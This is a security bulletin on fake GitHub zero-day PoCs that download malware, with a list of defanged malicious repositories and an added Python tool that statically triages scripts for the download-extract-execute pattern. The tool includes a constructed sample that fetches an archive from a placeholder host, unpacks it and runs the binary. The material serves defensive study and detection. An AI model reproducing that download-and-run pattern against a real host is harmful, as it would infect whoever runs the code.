Fake Zero-Day PoC Exploits on GitHub Push Windows, Linux malware

Cyber Security Threat Summary:
"Hackers are impersonating cybersecurity researchers on Twitter and GitHub to publish fake proof-of-concept exploits for zero-day vulnerabilities that infect Windows and Linux with malware. These malicious exploits are promoted by alleged researchers at a fake cybersecurity company named 'High Sierra Cyber Security,' who promote the GitHub repositories on Twitter, likely to target cybersecurity researchers and firms involved in vulnerability research. The repositories appear legitimate, and the users who maintain them impersonate real security researchers from Rapid7, and other security firms, even using their headshots. The same personas maintain accounts on Twitter to help add legitimacy to their research and the code repositories like GitHub, as well as draw victims from the social media platform" (Bleeping Computer, 2023).

According to cyber threat intelligence platform VulnCheck, the latest activity has been ongoing since May 2023, with the actors promoting fake exploits for zero-days in software such as Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. The threat actors are distributing the exploits as a Python script ('poc.py') on GitHub repositories, which acts as a malware downloader for Linux and Windows systems.

"The script downloads a ZIP archive from an external URL to the victim's computer depending on their operating system, with Linux users downloading 'cveslinux.zip' and Windows users receiving 'cveswindows.zip.' The malware is saved to the Windows %Temp% or the Linux /home//.local/share folders, extracted, and executed. VulnCheck reports that the Windows binary contained in the ZIP ('cves_windows.exe') is flagged by over 60% of AV engines on VirusTotal. The Linux binary ('cves_linux') is much more stealthy, only caught by three scanners" (Bleeping Computer, 2023).

Security Officer Comments:
It is unclear whether the latest campaign has succeeded in infecting any victims, and it is also uncertain what payloads are being deployed. Researchers say both the Windows and Linux executables install a TOR client. Furthermore, based on VirusTotal entries, the Windows version appears to be a password-stealing trojan.

VulnCheck included a list of malicious GitHub repositories hosting fake exploits, which were still available at the time of writing:

  • github[.]com/AKuzmanHSCS/Microsoft-Exchange-RCE
  • github[.]com/MHadzicHSCS/Chrome-0-day
  • github[.]com/GSandersonHSCS/discord-0-day-fix
  • github[.]com/BAdithyaHSCS/Exchange-0-Day
  • github[.]com/RShahHSCS/Discord-0-Day-Exploit
  • github[.]com/DLandonHSCS/Discord-RCE
  • github[.]com/SsankkarHSCS/Chromium-0-Day

Although these repositories will likely be taken down, this will not stop the threat actors from creating new ones. Researchers and cybersecurity professionals should therefore take caution when downloading scripts from unknown repositories, since this gives attackers an opportunity to infect unsuspecting users with malware.

Suggested Correction(s):
"When downloading code from GitHub, it is imperative that all code be scrutinized for malicious behavior. In this case, the downloading and execution of malware is easily visible in the PoCs, but that may not be the case in all situations where threat actors may obfuscate malicious code" (Bleeping Computer, 2023).

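Acting on the suggested correction above, the following added example (not VulnCheck's or Bleeping Computer's tooling, and not code from any of the repositories listed) statically triages a PoC script for the three stages the article describes: an OS-dependent fetch of an archive, extraction, and execution of the contents. It parses the script with Python's ast module rather than running it. The call-name heuristics, the two sample scripts, and the example.invalid URL are assumptions constructed for this example.

```python
"""Static triage of a downloaded PoC script for the downloader pattern the
article describes: fetch an archive chosen by OS, drop it under a home/temp
directory, extract it, execute the contents.  Added example; the heuristics
below and the sample scripts are constructed, not taken from any real PoC."""
import ast
from dataclasses import dataclass, field

# Assumed heuristics: dotted call-name prefixes for each stage of the pattern.
FETCH_PREFIXES = ("urllib.request.", "requests.", "http.client.")
EXEC_PREFIXES = ("os.system", "os.popen", "os.startfile", "os.exec", "os.spawn", "subprocess.")
EXTRACT_NAMES = {"extractall", "extract", "unpack_archive"}   # zipfile/tarfile/shutil
PLATFORM_PROBES = {"sys.platform", "os.name", "platform.system"}
PAYLOAD_SUFFIXES = (".zip", ".exe", ".tar.gz", ".dll", ".so")


@dataclass
class TriageReport:
    fetches: list = field(default_factory=list)     # (resolved call name, line)
    extracts: list = field(default_factory=list)
    executes: list = field(default_factory=list)
    platform_checks: int = 0
    payload_names: list = field(default_factory=list)

    @property
    def downloader_pattern(self) -> bool:
        """Fetch + extract + execute together is the signature described above."""
        return bool(self.fetches and self.extracts and self.executes)


def _dotted(node: ast.AST) -> str:
    """'a.b.c' for an attribute chain rooted at a Name; trailing attrs only otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def _aliases(tree: ast.AST) -> dict:
    """Map local names to the module path they import ('import x as y', 'from m import n')."""
    out = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    out[a.asname] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                out[a.asname or a.name] = f"{node.module}.{a.name}"
    return out


def _resolve(dotted: str, aliases: dict) -> str:
    head, _, rest = dotted.partition(".")
    head = aliases.get(head, head)
    return head + ("." + rest if rest else "")


def triage(source: str) -> TriageReport:
    """Parse a script (never execute it) and report which stages it contains."""
    tree = ast.parse(source)
    aliases = _aliases(tree)
    rep = TriageReport()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _resolve(_dotted(node.func), aliases)
            if name.startswith(FETCH_PREFIXES):
                rep.fetches.append((name, node.lineno))
            elif name.startswith(EXEC_PREFIXES):
                rep.executes.append((name, node.lineno))
            elif name.rsplit(".", 1)[-1] in EXTRACT_NAMES:
                rep.extracts.append((name, node.lineno))
        elif isinstance(node, ast.Attribute):
            if _resolve(_dotted(node), aliases) in PLATFORM_PROBES:
                rep.platform_checks += 1
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower().endswith(PAYLOAD_SUFFIXES):
                rep.payload_names.append(node.value)
    return rep


# Constructed sample: a PoC that only talks to the target given on the command line.
BENIGN_POC = '''\
import sys, requests
# Constructed sample: one request to the target on the command line, then a verdict
target = sys.argv[1]
r = requests.get(target + "/status", timeout=5)
print(r.status_code, len(r.text))
'''

# Constructed sample mirroring the article's description; example.invalid never resolves.
DOWNLOADER_POC = '''\
import os, sys, zipfile, urllib.request, subprocess
# Constructed sample of the fetch / extract / execute pattern; inert URL
name = "cveslinux.zip" if sys.platform.startswith("linux") else "cveswindows.zip"
dest = os.path.join(os.path.expanduser("~"), ".local", "share", name)
urllib.request.urlretrieve("https://example.invalid/" + name, dest)
zipfile.ZipFile(dest).extractall(os.path.dirname(dest))
subprocess.Popen([os.path.join(os.path.dirname(dest), "cves_linux")])
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_POC), ("downloader", DOWNLOADER_POC)):
        r = triage(src)
        print(f"{label}: downloader_pattern={r.downloader_pattern} fetch={len(r.fetches)} "
              f"extract={len(r.extracts)} exec={len(r.executes)} "
              f"platform_checks={r.platform_checks} payloads={r.payload_names}")
```

The benign sample is flagged only for a network fetch, which any working PoC needs; the downloader sample trips all three stages plus an OS probe and two archive names, which is exactly the shape the article describes. A script that triggers the full pattern belongs in an isolated sandbox, not on a research workstation, and obfuscated variants (string-built call names, exec of decoded blobs) will evade a heuristic this simple, so treat a clean result as a starting point for manual review rather than a verdict.
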
Link(s):
https://www.bleepingcomputer.com/